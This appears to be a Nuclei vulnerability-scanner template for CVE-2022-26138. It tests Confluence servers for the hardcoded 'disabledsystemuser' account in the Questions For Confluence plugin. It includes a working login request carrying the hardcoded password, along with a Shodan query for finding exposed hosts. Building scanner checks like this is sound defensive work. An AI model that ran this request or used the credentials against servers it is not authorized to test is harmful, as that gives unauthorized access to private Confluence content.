id: CVE-2022-26138

info:
  name: Atlassian Questions For Confluence - Hardcoded Credentials
  author: HTTPVoid
  severity: critical
  description: |
    Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group.
  remediation: |
    Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials.
  reference:
    - https://twitter.com/fluepke/status/1549892089181257729
    - https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html
    - https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26138
    - https://jira.atlassian.com/browse/CONFSERVER-79483
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-26138
    cwe-id: CWE-798
    epss-score: 0.96212
    epss-percentile: 0.99349
    cpe: cpe:2.3:a:atlassian:questions_for_confluence:2.7.34:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: questions_for_confluence
    shodan-query: http.component:"Atlassian Confluence"
  tags: cve,cve2022,confluence,atlassian,default-login,kev

http:
  - raw:
      - |
        POST /dologin.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        os_username={{os_username}}&os_password={{os_password}}&login=Log+in&os_destination=%2Fhttpvoid.action

    payloads:
      os_username:
        - disabledsystemuser
      os_password:
        - disabled1system1user6708
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'location == "/httpvoid.action"'

# digest: 4a0a00473045022100c013d0a2570a0c11994673c8e9548b627bc5e0afceccd479f43a022c64b051be02206c9f4e5eeb4fd5132c68a9bf7c2eede66729013cb0c6dd2a33658cf5cd762cc5:922c64590222798bb761d5b6d8e72950